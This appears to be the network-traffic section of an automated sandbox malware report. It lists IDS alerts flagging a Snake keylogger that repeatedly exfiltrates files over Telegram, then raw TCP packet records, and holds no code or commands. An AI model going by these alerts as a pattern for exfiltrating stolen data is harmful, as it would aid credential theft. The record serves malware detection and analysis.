2025-01-10T21:53:59.990628+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T21:54:00.415285+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T21:54:01.743321+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T21:54:02.010007+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T21:54:03.311177+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T21:54:03.762826+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T21:54:05.099974+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50014	149.154.167.220	443	TCP
2025-01-10T21:54:05.377072+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50014	149.154.167.220	443	TCP
2025-01-10T21:54:06.699169+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50016	149.154.167.220	443	TCP
2025-01-10T21:54:06.949529+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50016	149.154.167.220	443	TCP
2025-01-10T21:54:08.299177+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50018	149.154.167.220	443	TCP
2025-01-10T21:54:08.660150+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50018	149.154.167.220	443	TCP
2025-01-10T21:54:09.997332+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50020	149.154.167.220	443	TCP
2025-01-10T21:54:10.311142+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50020	149.154.167.220	443	TCP
2025-01-10T21:54:11.647843+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50022	149.154.167.220	443	TCP
2025-01-10T21:54:12.148088+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50022	149.154.167.220	443	TCP
2025-01-10T21:54:13.504537+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50024	149.154.167.220	443	TCP
2025-01-10T21:54:13.880682+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50024	149.154.167.220	443	TCP
2025-01-10T21:54:15.227888+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50026	149.154.167.220	443	TCP
2025-01-10T21:54:15.739463+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50026	149.154.167.220	443	TCP
2025-01-10T21:54:17.083559+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50028	149.154.167.220	443	TCP
2025-01-10T21:54:17.396884+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50028	149.154.167.220	443	TCP
2025-01-10T21:54:18.772286+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50030	149.154.167.220	443	TCP
2025-01-10T21:54:19.009047+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50030	149.154.167.220	443	TCP
2025-01-10T21:54:20.363513+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50032	149.154.167.220	443	TCP
2025-01-10T21:54:20.663616+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50032	149.154.167.220	443	TCP
2025-01-10T21:54:22.025052+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50034	149.154.167.220	443	TCP
2025-01-10T21:54:22.334571+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50034	149.154.167.220	443	TCP
2025-01-10T21:54:23.642541+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50036	149.154.167.220	443	TCP
2025-01-10T21:54:23.939305+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50036	149.154.167.220	443	TCP
2025-01-10T21:54:25.293495+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50038	149.154.167.220	443	TCP
2025-01-10T21:54:25.633403+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50038	149.154.167.220	443	TCP
2025-01-10T21:54:27.013839+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50040	149.154.167.220	443	TCP
2025-01-10T21:54:27.275603+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50040	149.154.167.220	443	TCP
2025-01-10T21:54:28.650344+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50042	149.154.167.220	443	TCP
2025-01-10T21:54:28.966098+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50042	149.154.167.220	443	TCP
2025-01-10T21:54:30.290587+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50044	149.154.167.220	443	TCP
2025-01-10T21:54:30.719533+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50044	149.154.167.220	443	TCP
2025-01-10T21:54:32.057964+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50046	149.154.167.220	443	TCP
2025-01-10T21:54:32.680343+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50046	149.154.167.220	443	TCP
2025-01-10T21:54:34.032254+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50048	149.154.167.220	443	TCP
2025-01-10T21:54:34.432841+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50048	149.154.167.220	443	TCP
2025-01-10T21:54:35.760434+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50050	149.154.167.220	443	TCP
2025-01-10T21:54:36.122209+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50050	149.154.167.220	443	TCP
2025-01-10T21:54:37.461689+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50052	149.154.167.220	443	TCP
2025-01-10T21:54:37.976920+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50052	149.154.167.220	443	TCP
2025-01-10T21:54:39.285866+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50054	149.154.167.220	443	TCP
2025-01-10T21:54:39.575244+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50054	149.154.167.220	443	TCP
2025-01-10T21:54:40.970394+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50056	149.154.167.220	443	TCP
2025-01-10T21:54:41.366751+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50056	149.154.167.220	443	TCP
2025-01-10T21:54:42.732052+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50058	149.154.167.220	443	TCP
2025-01-10T21:54:43.154255+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50058	149.154.167.220	443	TCP
2025-01-10T21:54:44.467248+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50060	149.154.167.220	443	TCP
2025-01-10T21:54:44.897740+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50060	149.154.167.220	443	TCP
2025-01-10T21:54:46.270205+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50062	149.154.167.220	443	TCP
2025-01-10T21:54:46.729765+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50062	149.154.167.220	443	TCP
2025-01-10T21:54:50.129484+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50064	149.154.167.220	443	TCP
2025-01-10T21:54:50.540759+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	50064	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:53:21.768343925 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:21.768381119 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:21.768817902 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:21.787136078 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:21.787163973 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.515831947 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.515923977 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.516916990 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.516988039 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.583139896 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.583185911 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.584116936 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.584306002 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.587376118 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.631350040 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.884840965 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.885008097 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.885068893 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.885225058 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.885247946 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.885320902 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.885725975 CET	443	49827	142.250.181.238	192.168.2.5
Jan 10, 2025 21:53:22.885735035 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.885790110 CET	49827	443	192.168.2.5	142.250.181.238
Jan 10, 2025 21:53:22.912890911 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:22.912961960 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:22.913054943 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:22.913326979 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:22.913348913 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:23.580215931 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:23.580341101 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:23.585712910 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:23.585737944 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:23.586148024 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:23.586225986 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:23.600946903 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:23.643347025 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.810261011 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.810596943 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.815973997 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.816083908 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.828414917 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.828504086 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.828533888 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.828588963 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.834798098 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.834873915 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.902117014 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.902219057 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.902259111 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.902271032 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.902321100 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.902347088 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.902347088 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.902369976 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.902399063 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.902443886 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.905504942 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.905580044 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.905606031 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.905657053 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.911808014 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.911886930 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.911916971 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.911967993 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.917993069 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.918076992 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.918097973 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.918148041 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.924271107 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.924345016 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.924365997 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.924413919 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.930650949 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.930772066 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.930795908 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.930846930 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.936881065 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.936964035 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.936986923 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.937036991 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.943694115 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.943784952 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.943811893 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.943945885 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.948494911 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.948597908 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.948621035 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.948667049 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.954518080 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.954600096 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.954627037 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.954673052 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.960052013 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.960128069 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.967160940 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.967334986 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.967365980 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.967422962 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994498014 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994565964 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994580984 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994605064 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994640112 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994676113 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994687080 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994750023 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994807959 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994870901 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994925976 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.994987011 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.994999886 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.995058060 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.995065928 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.995079041 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.995112896 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.995152950 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.995162964 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.995225906 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.996393919 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.996455908 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:26.997956038 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:26.998043060 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.001926899 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.001996994 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.002010107 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.002069950 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.006890059 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.006983995 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.006998062 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.007057905 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.011881113 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.011950016 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.011965036 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.012026072 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.016474009 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.016545057 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.016556978 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.016623020 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.021234989 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.021322966 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.021336079 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.021393061 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.025886059 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.025960922 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.025973082 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.026031017 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.030459881 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.030534983 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.030548096 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.030610085 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.035218000 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.035350084 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.035397053 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.035465002 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.039848089 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.039937973 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.039961100 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.040024996 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.044054985 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.044138908 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.044156075 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.044224977 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.048257113 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.048326015 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.048356056 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.048414946 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.048508883 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.048564911 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.048599005 CET	443	49835	172.217.18.97	192.168.2.5
Jan 10, 2025 21:53:27.048603058 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.048664093 CET	49835	443	192.168.2.5	172.217.18.97
Jan 10, 2025 21:53:27.385272980 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:27.390175104 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:27.390258074 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:27.390430927 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:27.395172119 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:28.090756893 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:28.099018097 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:28.103823900 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:28.334659100 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:28.377863884 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:28.693413973 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:28.693471909 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:28.693542004 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:28.695831060 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:28.695852995 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.204277992 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.204368114 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:29.208568096 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:29.208581924 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.209148884 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.216557980 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:29.259381056 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.355130911 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.355287075 CET	443	49871	104.21.16.1	192.168.2.5
Jan 10, 2025 21:53:29.355487108 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:29.365433931 CET	49871	443	192.168.2.5	104.21.16.1
Jan 10, 2025 21:53:34.784805059 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:34.789706945 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:34.998574018 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:35.036091089 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.036130905 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.036199093 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.036622047 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.036638021 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.049704075 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:35.685410976 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.685494900 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.687998056 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.688010931 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.688380003 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.689920902 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.731349945 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.731436968 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.731453896 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.981921911 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.982111931 CET	443	49912	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:35.982203960 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:35.982779980 CET	49912	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:36.147372961 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:36.148741961 CET	49919	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:36.152439117 CET	80	49861	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:36.152539015 CET	49861	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:36.153664112 CET	80	49919	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:36.153750896 CET	49919	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:36.153876066 CET	49919	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:36.158684015 CET	80	49919	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:36.826298952 CET	80	49919	132.226.247.73	192.168.2.5
Jan 10, 2025 21:53:36.829098940 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:36.829124928 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:36.829193115 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:36.829763889 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:36.829778910 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:36.877826929 CET	49919	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:53:37.457616091 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:37.461133003 CET	49924	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:53:37.461154938 CET	443	49924	149.154.167.220	192.168.2.5
Jan 10, 2025 21:53:37.461222887 CET	49924	443	192.168.2.5	149.154.167.220
